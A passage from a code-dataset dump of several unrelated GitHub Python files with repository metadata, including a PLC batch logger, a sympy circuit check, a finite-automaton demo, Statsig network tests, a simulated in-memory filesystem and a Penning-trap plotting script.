self.dateFormate(str(end_time[1]))\n\n countofbatch=BatchModel().find_by_batch_id_and_unitname(batchNumber[1],reactorName[1])\n\n if(countofbatch==None):\n\n\n BatchModel().insert(batchStratTime,batchEndTime, productName[1], batchNumber[1], reactorName[1],self.device_id)\n\n for j in range(phaseCount[1]):\n actual=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Actual\")\n print(\"actual\",actual[1])\n print(\"actualtag\", self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Actual\")\n pe=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.EndTime\")\n #print(\"pe\", pe)\n phaseEndtime=self.dateFormate(pe[1])\n #print(\"phaseEndtime\", phaseEndtime)\n setPoint=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Setpoint\")\n print(\"setPoint\", setPoint[1])\n print(\"setPointtag\", self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Setpoint\")\n\n ps=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.StartTime\")\n\n phaseStarttime=self.dateFormate(ps[1])\n #print(\"phaseStarttime\", phaseStarttime)\n phaseName=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.Name\")\n #print(\"phaseName\",phaseName[1])\n if(len(setPoint) !=0 or len(actual) !=0):\n ReportModel().insert(batchNumber[1],phaseName[1],phaseStarttime,phaseEndtime,setPoint[1],actual[1],reactorName[1],self.device_id)\n\n\n time.sleep(1)\n # except:\n # print(\"except\")\n # self.endBit()\n def run(self) -> None:\n self.endBit()\n\n\n\n","repo_name":"synfoit/WebMasterConnect","sub_path":"ReactorEndbit.py","file_name":"ReactorEndbit.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7275017300","text":"#Importo librerias de la catedra\nimport sympy as sp\nimport pytc2.cuadripolos as tc2\nfrom pytc2.general import print_latex\n\n#Verificacion simbolica ej 2\n\ns = sp.symbols('s', complex = True)\nZ1, Z3 = sp.symbols('L1 L3', complex = True)\nY1 = 1/(s*Z1)\nY2 = s*sp.symbols('C2', complex = True)\nY3 = 1/(s*Z3)\nR = sp.symbols('R', real = True, positive = True)\nG = 1/R\n\n#MAI \n\nMAI = sp.Matrix([\n [Y1, -Y1, 0, 0],\n [-Y1, Y1+Y2+Y3, -Y2, -Y3],\n [0, -Y2, Y2 + G, -G],\n [0, -Y3, -G, Y3 + G]\n ])\n\ncon_detalles = True\n\n#Verifico transferencia\ntf = tc2.calc_MAI_vtransf_ij_mn(MAI, 2, 3, 0, 2, verbose = con_detalles)\n\nprint('Cálculo de la transferencia')\nprint_latex('T(s) = ' + sp.latex(tf))\n\n#Reemplazo valores para obtenerla normalizada\ntf_n = sp.simplify(tf.subs(Z1, 3/2))\ntf_n = sp.simplify(tf_n.subs(Y2, s*(4/3)))\ntf_n = sp.simplify(tf_n.subs(Z3, 1/2))\ntf_n = sp.simplify(tf_n.subs(R, 1))\n\nprint_latex('T(s) = ' + sp.latex(tf_n))\n\n#Verifico impedancia de entrada\ncon_detalles = False\nZe = tc2.calc_MAI_impedance_ij(MAI, 0, 2, verbose = con_detalles)\nprint('Cálculo de la impedancia de entrada')\nprint_latex('Ze(s) = ' + sp.latex(Ze))","repo_name":"fabhri01/tc2","sub_path":"python/ts6.py","file_name":"ts6.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42949748941","text":"from sys import exit\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 決定性有限オートマトンを定義して語の判別を行う\r\n \"\"\"\r\n lang_21 = Automaton_elem(\r\n \"pqrd\", # 状態\r\n \"ab\", # アルファベット\r\n [ # 動作関数\r\n [\"p\", \"a\", \"q\"],\r\n [\"p\", \"b\", \"d\"],\r\n [\"q\", \"a\", \"q\"],\r\n [\"q\", \"b\", \"r\"],\r\n [\"r\", \"a\", \"d\"],\r\n [\"r\", \"b\", \"r\"],\r\n [\"d\", \"a\", \"d\"],\r\n [\"d\", \"b\", \"d\"],\r\n ],\r\n \"p\", # 初期状態\r\n \"r\", # 受理状態\r\n )\r\n if lang_21.is_define() == 1:\r\n print(\"The automaton isn't correct.\")\r\n exit(1)\r\n # print('self.states: ', lang_21.states)\r\n # print('self.chars: ', lang_21.chars)\r\n # print('self.mv_func: ', lang_21.mv_func)\r\n # print('self.init_state: ', lang_21.init_state)\r\n # print('self.acce_state: ', lang_21.acce_state)\r\n # print('self.now_state: ', lang_21.now_state)\r\n word = \"aabb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n word = \"aabbaabb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n word = \"aacbb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n return 0\r\n\r\n\r\nclass Automaton_elem:\r\n \"\"\"\r\n 決定性有限オートマトン\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n state_str: str,\r\n char_str: str,\r\n mv_func_array: list,\r\n init_state_str: str,\r\n acce_state_str: str,\r\n ) -> None:\r\n \"\"\"\r\n コンストラクタ\r\n \"\"\"\r\n self.states = set(state_str) # 状態の有限集合(Q)\r\n self.chars = set(char_str) # アルファベット(Σ)\r\n self.mv_func = mv_func_array # 動作関数(Q, Σ) = Q -> [Q, Σ, Q](2次元配列)\r\n self.init_state = init_state_str # 初期状態(文字1つ, Qに属する)\r\n self.acce_state = set(acce_state_str) # 受理状態(Qの部分集合)\r\n self.now_state = init_state_str # 遷移中の状態(Qに属する)\r\n\r\n def init_now_state(self):\r\n \"\"\"\r\n self.now_stateを初期化する\r\n \"\"\"\r\n self.now_state = self.init_state # 初期状態に戻す\r\n\r\n def is_define(self) -> int:\r\n \"\"\"\r\n オートマトンが正しく定義されているかの確認\r\n 正しく定義されていれば0を返す(他は1を返す)\r\n \"\"\"\r\n tmp_states = [] # 状態\r\n tmp_chars = [] # アルファベット\r\n for i in self.mv_func: # 動作関数から状態とアルファベットを取り出す\r\n tmp_states.append(i[0]) # Q\r\n tmp_chars.append(i[1]) # Σ\r\n tmp_states.append(i[2]) # Q\r\n if (\r\n # (受理状態 ⊆ 状態の有限集合) ∧ (初期状態 ⊆ 状態の有限集合)\r\n (self.acce_state <= self.states)\r\n and (set(self.init_state) <= self.states)\r\n and\r\n # (動作関数から取り出した状態 == 状態の有限集合) ∧ (動作関数から取り出したアルファベット == アルファベット)\r\n (set(tmp_states) == self.states)\r\n and (set(tmp_chars) == self.chars)\r\n ):\r\n return 0\r\n else:\r\n return 1\r\n\r\n def is_alphabet(self, txt: str):\r\n \"\"\"\r\n 文字列がアルファベットに属しているかを判別する\r\n 文字列 ⊆ アルファベットであれば0を返す\r\n \"\"\"\r\n if set(txt) <= self.chars:\r\n return 0\r\n else:\r\n return 1\r\n\r\n def is_accept(self) -> int:\r\n \"\"\"\r\n 状態遷移をさせた結果、受理状態であるかを判断する\r\n 状態(now_state)が受理状態であれば0を返す\r\n \"\"\"\r\n if set(self.now_state) <= self.acce_state:\r\n return 0\r\n else:\r\n return 1\r\n\r\n def state_transiton(self, words: str) -> int:\r\n \"\"\"\r\n 動作関数を用いて状態遷移を行う\r\n 語(words)が受理可能であれば0を返す\r\n \"\"\"\r\n self.init_now_state() # 初期化\r\n if self.is_alphabet(words):\r\n return 1 # 入力文字列 <= アルファベットでない\r\n for w in words: # 語を頭から順に取り出す\r\n for i in range(len(self.mv_func)): # 動作関数に当てはめていく\r\n if (self.mv_func[i][0] == self.now_state) and (self.mv_func[i][1] == w):\r\n self.now_state = self.mv_func[i][2] # 状態遷移\r\n print(\r\n \"({0}, {1}) = {2}\".format(\r\n self.mv_func[i][0], self.mv_func[i][1], self.mv_func[i][2]\r\n )\r\n ) # ログ\r\n break\r\n return self.is_accept()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"guy-nth/Automaton_practice","sub_path":"automaton_01.py","file_name":"automaton_01.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4864228688","text":"from .IObserver import IObserver\nfrom .ISubject import ISubject\nfrom .IDisplayElement import IDisplayElement\n\n\nclass ForecastDisplay(IObserver, IDisplayElement):\n def __init__(self, weather_data: ISubject):\n self._weather_data = weather_data\n self._weather_data.register_observer(self)\n self._display_message = [\"天候は良くなります!\", \"より寒く雨模様の天候に注意してください\", \"ほとんど同じです\"]\n self._counter = 0\n\n def update(self, temp, humidity, pressure):\n _ = humidity\n _ = pressure\n _ = temp\n self.display()\n\n def display(self):\n print(f\"予報: {self._display_message[self._counter]}\")\n if self._counter > 2:\n self._counter = 0\n else:\n self._counter += 1\n","repo_name":"S-Tatsuya/DesignPattern","sub_path":"Pattern/Observer/HeadFirst/src/ForecastDisplay.py","file_name":"ForecastDisplay.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3027168426","text":"import datetime\nimport math\nimport string\nfrom abc import ABC\nimport sys\nfrom typing import Dict, List\n\nimport constants\nimport utils\n\n\nclass Memory:\n OFFSET_BITS = int(math.log2(constants.BLOCK_SIZE))\n BLOCK_BITS = int(math.log2(constants.TOTAL_BLOCKS))\n\n def __init__(self, total_size=constants.TOTAL_MEMORY_SIZE) -> None:\n self.space_used = 0\n self.total_size = int(total_size)\n self.memory: List[List[int]] = [[0] * constants.BLOCK_SIZE\n for _ in range(constants.TOTAL_BLOCKS)]\n\n # addr -> size\n # addr [4 bits for block number, 6 bits for offset]\n self.allocations: Dict[int, int] = {}\n self.used_per_allocation: Dict[int, int] = {}\n self.free_blocks = [i for i in range(constants.TOTAL_BLOCKS)]\n\n def allocate(self, size: int):\n if self.space_used + size > self.total_size:\n raise ValueError('Not enough space in memory')\n\n if size > constants.MAX_FILE_SIZE:\n raise ValueError(\n f'File size too large (max {constants.MAX_FILE_SIZE} bytes)')\n\n if len(self.free_blocks) == 0:\n raise ValueError('No free blocks available')\n\n block = self.free_blocks.pop(0)\n addr = block << self.OFFSET_BITS\n\n self.allocations[addr] = size\n self.used_per_allocation[addr] = 0\n self.space_used += size\n\n return addr\n\n def read_file(self, addr: int, starting_byte=0, num_bytes=None):\n size = self.allocations[addr]\n if num_bytes is None:\n num_bytes = self.used_per_allocation[addr]\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n return self.memory[block][offset + starting_byte:offset + starting_byte + num_bytes]\n\n def truncate(self, addr: int, new_size: int):\n if new_size > self.allocations[addr]:\n raise ValueError('New size must be smaller than current size')\n\n self.allocations[addr] = new_size\n self.used_per_allocation[addr] = min(\n self.used_per_allocation[addr], new_size)\n\n def write_file(self, addr: int, data: List[int]):\n size = self.allocations[addr]\n if len(data) > size:\n addr = self.reallocate(addr, len(data))\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n # self.memory[block][offset:len(data)] = data\n self.memory[block] = self.memory[block][:offset] + \\\n data + self.memory[block][offset + len(data):]\n self.used_per_allocation[addr] = len(data)\n return addr\n\n def append_file(self, addr: int, data: List[int]):\n new_addr = addr\n previous_data_length = self.used_per_allocation[addr]\n if previous_data_length + len(data) > self.allocations[addr]:\n new_addr = self.reallocate(addr, previous_data_length + len(data))\n\n previous_data = self.read_file(addr, 0, previous_data_length)\n return self.write_file(new_addr, previous_data + data)\n\n def move_within_file(self, addr: int, starting_byte: int, content_length: int, writing_byte: int):\n if starting_byte + content_length > self.allocations[addr]:\n raise ValueError(\n 'Starting byte + content length must be less than or equal to file size')\n\n if writing_byte + content_length > self.allocations[addr]:\n raise ValueError(\n 'Writing byte + content length must be less than or equal to file size')\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n data = self.read_file(addr, starting_byte,\n starting_byte + content_length)\n\n self.memory[block][offset + writing_byte:offset +\n writing_byte + content_length] = data\n\n return addr\n\n def reallocate(self, addr: int, new_size: int):\n if self.space_used - self.allocations[addr] + new_size > self.total_size:\n raise ValueError('Not enough space in memory')\n\n self.deallocate(addr)\n return self.allocate(new_size)\n\n def deallocate(self, addr: int):\n size = self.allocations.get(addr, None)\n if size is None:\n return\n\n block = addr >> self.OFFSET_BITS\n self.free_blocks.append(block)\n self.space_used -= size\n del self.allocations[addr]\n del self.used_per_allocation[addr]\n\n def get_free_space(self):\n return self.total_size - self.space_used\n\n def show_memory_map(self, outfile=sys.stdout):\n print(\"Memory Map:\", file=outfile)\n print(\"Free Blocks:\", self.free_blocks, file=outfile)\n for i, (addr, size) in enumerate(self.allocations.items()):\n print(\n f\"Allocation#{i+1} | Block#{addr >> self.OFFSET_BITS} Address: {hex(addr)}, Size: {size}, Used: {self.used_per_allocation[addr]}\", file=outfile)\n\n def show_memory_layout(self, outfile=sys.stdout):\n print(\"Memory Layout:\", file=outfile)\n for i, block in enumerate(self.memory):\n print(f\"Block {i}: {block}\", file=outfile)\n\n def __dict__(self):\n return {\n 'space_used': self.space_used,\n 'total_size': self.total_size,\n 'allocations': self.allocations,\n 'used_per_allocation': self.used_per_allocation,\n 'memory': self.memory,\n }\n\n @classmethod\n def from_dict(cls, data):\n memory = cls(data['total_size'])\n memory.space_used = data['space_used']\n memory.allocations = {\n int(addr): size for addr,\n size in data['allocations'].items()\n }\n memory.used_per_allocation = {\n int(addr): size for addr,\n size in data['used_per_allocation'].items()\n }\n memory.memory = data['memory']\n return memory\n\n\nclass FS_Node(ABC):\n memory: Memory\n\n def __init__(self, name: string, date_created: datetime) -> None:\n self.name = name\n self.date_created = date_created\n self.parent: FS_Node = None\n\n def print_directory_structure(self, level=0, max_level=10):\n if level > max_level:\n return\n\n print('\\t' * level,\n '--',\n utils.TColors.OKCYAN + utils.TColors.BOLD if isinstance(\n self, DirectoryNode) else '',\n self.name,\n utils.TColors.ENDC)\n if isinstance(self, DirectoryNode):\n for child in self.children:\n child.print_directory_structure(level + 1, max_level)\n\n def __dict__(self):\n return self.name\n\n def __str__(self) -> str:\n return self.name\n\n @classmethod\n def from_dict(cls, data):\n return data.get('type') == DirectoryNode.__name__ and DirectoryNode.from_dict(data) or FileNode.from_dict(data)\n\n\nclass DirectoryNode(FS_Node):\n def __init__(self, name: string, date_created: datetime) -> None:\n super().__init__(name, date_created)\n self.children: List[FS_Node] = []\n\n def add_child(self, child: FS_Node) -> FS_Node:\n self.children.append(child)\n child.parent = self\n return child\n\n def remove_child(self, child: FS_Node):\n self.children.remove(child)\n # child.__del__()\n\n def get_child(self, name: str):\n for child in self.children:\n if child.name == name:\n return child\n\n return None\n\n def __dict__(self):\n return {\n 'name': self.name,\n 'date_created': str(self.date_created),\n 'parent': str(self.parent) if self.parent else None,\n 'children': self.children,\n\n 'type': __class__.__name__\n }\n\n def __str__(self) -> str:\n return super().__str__()\n\n def __del__(self):\n # print('Deleting', self.name)\n for child in self.children:\n child.__del__()\n\n @classmethod\n def from_dict(cls, data):\n dir = DirectoryNode(\n data['name'], utils.get_datetime_object(data['date_created']))\n\n for child in data['children']:\n if child['type'] == FileNode.__name__:\n dir.add_child(FileNode.from_dict(child))\n elif child['type'] == DirectoryNode.__name__:\n dir.add_child(DirectoryNode.from_dict(child))\n\n return dir\n\n\nclass FileNode(FS_Node):\n STATE_CLOSE = 0\n STATE_OPEN = 1\n\n MODE_NONE = None\n MODE_READ = 'r'\n MODE_WRITE = 'w'\n MODE_APPEND = 'a'\n\n def __init__(self, name: string, date_created: datetime = datetime.datetime.now(), date_modified: datetime = datetime.datetime.now()) -> None:\n super().__init__(name, date_created)\n self.date_modified = date_modified\n self.starting_addr = -1\n self.size = 0\n\n self.state = FileNode.STATE_CLOSE\n self.mode: FileNode.MODE_NONE | FileNode.MODE_READ | FileNode.MODE_WRITE | FileNode.MODE_APPEND = FileNode.MODE_NONE\n\n def set_size(self, size):\n if 0 <= size < constants.MAX_FILE_SIZE:\n self.size = size\n\n raise ValueError(\n f'File size must be between 0 and {constants.MAX_FILE_SIZE / 1024} KB')\n\n def set_starting_addr(self, addr):\n if 0 <= addr < constants.TOTAL_MEMORY_SIZE:\n self.starting_addr = addr\n\n raise ValueError(\n f'Starting address must be between 0 and {constants.TOTAL_MEMORY_SIZE / 1024} KB')\n\n def __dict__(self):\n return {\n 'name': self.name,\n 'date_created': str(self.date_created),\n 'date_modified': str(self.date_modified),\n 'parent': str(self.parent) if self.parent else None,\n 'starting_addr': self.starting_addr,\n 'size': self.size,\n\n 'type': __class__.__name__\n }\n\n def __str__(self) -> str:\n return super().__str__()\n\n def __del__(self):\n if self.starting_addr != -1 and self.size != 0:\n FS_Node.memory.deallocate(self.starting_addr)\n # print('Deallocated memory', self.starting_addr)\n\n @classmethod\n def from_dict(cls, data):\n file = FileNode(data['name'], utils.get_datetime_object(\n data['date_created']), utils.get_datetime_object(data['date_modified']))\n file.parent = data['parent']\n file.starting_addr = data['starting_addr']\n file.size = data['size']\n\n return file\n","repo_name":"Ayeshas09/filesystem","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":10455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38818872045","text":"#############################\n# #\n# POINT 3 IN PROBLEM 8 #\n# #\n#############################\nfrom platform import platform\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# The filenames of the files the data will be extracted from\nfilename_1 = \"two_particle_data_w_int.txt\" # With interactions\nfilename_2 = \"two_particle_data_no_int.txt\" # Without interactions\n# Both files has this header (the comment under is just to have \n# somewhat control of placement numbering):\n# Time, x1, x2, y1, y2, z1, z2, vx1, vx2, vy1, vy2, vz1, vz2\n# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12\n\n\n\n# This plots two particles movement in a Penning trap, in the x,vx-plane and the z,vz-plane\ndef two_particle_penning_xzv(filename_1,filename_2):\n\n # Creating an empty lists for both the particles in the Penning trap with (w) and \n # without (wo) interactions.\n # Particle 1:\n x1_w = []\n z1_w = []\n vx1_w = []\n vz1_w = []\n x1_wo = []\n z1_wo = []\n vx1_wo = []\n vz1_wo = []\n # Particle 2:\n x2_w = []\n z2_w = []\n vx2_w = []\n vz2_w = []\n x2_wo = []\n z2_wo = []\n vx2_wo = []\n vz2_wo = []\n \n\n\n ######################################################\n # WITH INTERACTIONS #\n # Extracts the data for the trajectory with #\n # interactions #\n ######################################################\n with open(filename_1) as f: \n next(f) # Skipping the header (top) row\n text = f.read()\n\n # Splitting it by \\n\n line_ls = text.split('\\n')\n del line_ls[-1] # Last line is empty, so we delete it, bitch bye\n\n for i in line_ls:\n line_cont_ls = i.split(\",\") # List of values in the line\n\n\n # Extracting values from filename_1\n x1_w_val = line_cont_ls[1]\n z1_w_val = line_cont_ls[5]\n vx1_w_val = line_cont_ls[7]\n vz1_w_val = line_cont_ls[11]\n x2_w_val = line_cont_ls[2]\n z2_w_val = line_cont_ls[6]\n vx2_w_val = line_cont_ls[8]\n vz2_w_val = line_cont_ls[12]\n\n # Adding the values to the belonging lists\n x1_w.append(x1_w_val)\n z1_w.append(z1_w_val)\n vx1_w.append(vx1_w_val)\n vz1_w.append(vz1_w_val)\n x2_w.append(x2_w_val)\n z2_w.append(z2_w_val)\n vx2_w.append(vx2_w_val)\n vz2_w.append(vz2_w_val)\n\n\n\n ######################################################\n # WITHOUT INTERACTIONS #\n # Extracts the data for the trajectory without #\n # interactions #\n ######################################################\n with open(filename_2) as f: \n next(f)\n text = f.read()\n line_ls = text.split('\\n')\n del line_ls[-1] # Last line is empty, so we delete it, bitch bye\n\n for j in line_ls:\n line_cont_ls = j.split(\",\") # List of values in the line\n\n # Extracting values from filename_2\n x1_wo_val = line_cont_ls[1]\n z1_wo_val = line_cont_ls[5]\n vx1_wo_val = line_cont_ls[7]\n vz1_wo_val = line_cont_ls[11]\n x2_wo_val = line_cont_ls[2]\n z2_wo_val = line_cont_ls[6]\n vx2_wo_val = line_cont_ls[8]\n vz2_wo_val = line_cont_ls[12]\n\n # Adding the values to the belonging lists\n x1_wo.append(x1_wo_val)\n z1_wo.append(z1_wo_val)\n vx1_wo.append(vx1_wo_val)\n vz1_wo.append(vz1_wo_val)\n x2_wo.append(x2_wo_val)\n z2_wo.append(z2_wo_val)\n vx2_wo.append(vx2_wo_val)\n vz2_wo.append(vz2_wo_val)\n\n # Returning all the complete lists\n return x1_w,z1_w,vx1_w,vz1_w,x1_wo,z1_wo,vx1_wo,vz1_wo,x2_w,z2_w,vx2_w,vz2_w,x2_wo,z2_wo,vx2_wo,vz2_wo\n\n\n\n\n\n# RUNNING THE CODE\nx1_w,z1_w,vx1_w,vz1_w,x1_wo,z1_wo,vx1_wo,vz1_wo,x2_w,z2_w,vx2_w,vz2_w,x2_wo,z2_wo,vx2_wo,vz2_wo = two_particle_penning_xzv(filename_1,filename_2)\n\n\n\n######################################################\n# PLOTTING #\n# Plotting all 4 plots, saving them, one at a time #\n######################################################\n\n# PLOT 1: For two particles' trajectories with interactions in the (x,vx) plane\nplt.plot(np.asarray(x1_w,float), np.asarray(vx1_w,float), color='forestgreen', label='Particle 1')\nplt.plot(np.asarray(x2_w,float), np.asarray(vx2_w,float), color='limegreen', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, with interactions')\nplt.xlabel('x [\\u03bcm]')\nplt.ylabel('$v_x$ [\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_x_w.svg\", format=\"svg\") \nplt.close()\n\n# PLOT 2: For two particles' trajectories without interactions in the (x,vx) plane\nplt.plot(np.asarray(x1_wo,float), np.asarray(vx1_wo,float), color='teal', label='Particle 1')\nplt.plot(np.asarray(x2_wo,float), np.asarray(vx2_wo,float), color='mediumturquoise', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, without interactions')\nplt.xlabel('x [\\u03bcm]')\nplt.ylabel('$v_x$ [\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_x_wo.svg\", format=\"svg\") \nplt.close()\n\n# PLOT 3: For two particles' trajectories with interactions in the (z,vz) plane\nplt.plot(np.asarray(z1_w,float), np.asarray(vz1_w,float), color='salmon', label='Particle 1')\nplt.plot(np.asarray(z2_w,float), np.asarray(vz2_w,float), color='red', label='Particle 2')\nplt.title('Trajectories in the (z,$v_z$)-plane, with interactions')\nplt.xlabel('z [\\u03bcm]')\nplt.ylabel('v\\_{z}[\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_z_w.svg\", format=\"svg\") \nplt.close()\n \n# PLOT 4: For two particles' trajectories without interactions in the (z,vz) plane\nplt.plot(np.asarray(z1_wo,float), np.asarray(vz1_wo,float), color='darkmagenta',label='Particle 1')\nplt.plot(np.asarray(z2_wo,float), np.asarray(vz2_wo,float), color='orchid', label='Particle 2')\nplt.title('Trajectories in the (x,$v_x$)-plane, without interactions')\nplt.xlabel('z [\\u03bcm]')\nplt.ylabel('$v_z$[\\u03bcm/\\u03bcs]')\nplt.legend()\nplt.savefig(\"two_particle_traj_z_wo.svg\", format=\"svg\") \nplt.close()","repo_name":"siljevik/FYS4150","sub_path":"Project_3/8/two_particles_penning_traj.py","file_name":"two_particles_penning_traj.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"10265880415","text":"import statistics as stats\nimport math\nn = int(input())\narr = list(map(int,input().split(\" \")))\narr.sort()\nq2 = stats.median(arr)\nleft = arr[:int(n/2)] if n%2 == 0 else arr[:math.floor(n/2)]\nq1 = int(stats.median(left))\nright = arr[int(n/2):] if n%2 == 0 else arr[math.ceil(n/2):]\nq3 = int(stats.median(right))\nprint(\"%d\\n%d\\n%d\"%(q1,q2,q3))\n","repo_name":"omkarsk98/Data-Structures","sub_path":"HackerRank/10DaysOfStatistics/Day1:Quartiles.py","file_name":"Day1:Quartiles.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"19721784491","text":"def _get_models(data):\n \"\"\"Returns set of models defined within an input file.\n\n \"\"\"\n return data['RESULTS'].keys()\n\n\ndef _get_reference_types(data):\n \"\"\"Returns set of reference types defined within an input file.\n\n \"\"\"\n return [(i, u\"{}Reference\".format(i)) for i in set(data['References'].keys())]\n\n\ndef _get_simulation(data, model):\n \"\"\"Returns simulation name.\n\n \"\"\"\n return data['RESULTS'][model]['SimulationDescription']['Realization']\n\n\ndef _get_regions(data):\n \"\"\"Returns set of regional maskings defined within an input file.\n\n \"\"\"\n return data['RegionalMasking'].keys()\n\n\ndef _get_variable(data):\n \"\"\"Returns variable name within an input file.\n\n \"\"\"\n if 'level' in data['Variable']:\n return \"{}-{}\".format(data['Variable']['id'], int(data['Variable']['level']))\n return data['Variable']['id']\n\n\ndef _get_metrics(data, reference_type_key, model, simulation, masking):\n \"\"\"Returns collection of metrics.\n\n \"\"\"\n result = dict()\n\n metrics = data['RESULTS'][model][reference_type_key][simulation][masking]\n for metric_name in metrics:\n for period in metrics[metric_name]:\n result[\"{}_{}\".format(metric_name, period)] = metrics[metric_name][period]\n\n return result\n\n\ndef _get_groups(data):\n \"\"\"Returns set of metric groups defined within an input file.\n\n \"\"\"\n result = []\n for reference_type, reference_type_key in _get_reference_types(data):\n variable = _get_variable(data)\n for model in _get_models(data):\n simulation = _get_simulation(data, model)\n for region in _get_regions(data):\n masking = region\n try:\n result.append((\n reference_type,\n model,\n simulation,\n masking,\n region,\n variable,\n _get_metrics(data, reference_type_key, model, simulation, masking)\n ))\n except KeyError:\n pass\n\n return result\n\n\ndef decode(data):\n \"\"\"Decodes set of metrics files.\n\n :param list data: Raw metrics data.\n\n :returns: Input data to be transformed.\n :rtype: list\n\n \"\"\"\n return (data, _get_groups(data))\n","repo_name":"ESPRI-Mod/hermes-client","sub_path":"hermes_client/metrics/formatter/decoder_pcmdi_2.py","file_name":"decoder_pcmdi_2.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13893840305","text":"import unittest\n\nfrom uuid import uuid4\nfrom statsig.statsig_error_boundary import _StatsigErrorBoundary\nfrom statsig.statsig_event import StatsigEvent\nfrom statsig.statsig_metadata import _StatsigMetadata\nfrom statsig.statsig_network import _StatsigNetwork\nfrom statsig.statsig_user import StatsigUser\nfrom statsig import globals\nfrom statsig import StatsigOptions\n\nclass TestNetwork(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # This test logspews expected errors, but the test itself should pass\n globals.logger._disabled = False\n metadata = _StatsigMetadata.get()\n cls.net = _StatsigNetwork(\"secret-test\", StatsigOptions(disable_diagnostics=True), metadata, _StatsigErrorBoundary())\n cls.net._raise_on_error = True\n\n @classmethod\n def tearDownClass(cls):\n globals.logger._disabled = True\n\n def test_invalid_user(self):\n user = StatsigUser(user_id= \"123\", custom={'field': uuid4()})\n event = StatsigEvent(user, \"test_event\")\n # request fails due to json serialization of user\n self.assertRaises(\n TypeError,\n self.net.retryable_request,\n \"log_event\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n \n def test_invalid_metadata(self):\n user = StatsigUser(user_id= \"123\", )\n event = StatsigEvent(user, \"test_event\", None, {'field': uuid4()})\n # request fails due to json serialization of event\n self.assertRaises(\n TypeError,\n self.net.retryable_request,\n \"log_event2\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n \n def test_invalid_post(self):\n user = StatsigUser(user_id= \"123\", )\n event = StatsigEvent(user, \"test_event\", None, {'field': uuid4()})\n # request fails due to json serialization of event\n self.assertRaises(\n TypeError,\n self.net.post_request,\n \"log_event3\",\n {\n 'events':[\n event.to_dict()\n ],\n },\n True,\n )\n","repo_name":"statsig-io/python-sdk","sub_path":"tests/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"41460812425","text":"import itertools\n\na = list(itertools.product('МЕТРО', repeat=4))\n\ncounter = 0\n\nfor element in a:\n element = ''.join(element)\n if element[0] in 'МТР' and element[-1] in 'ЕО':\n counter += 1\n\nprint(counter)\n","repo_name":"shlyapp/ege-informatika","sub_path":"udgu/2/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"23138921077","text":"import re\n\nimport psycopg2 as psycopg2\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom app.config import settings\nfrom app.parser.data.headers import HEADERS\nfrom app.parser.data.headers import MOBILE_USER_AGENTS\n\nURL = 'http://www.volleymsk.ru/ap/members.php?id=7548'\nlastURL = 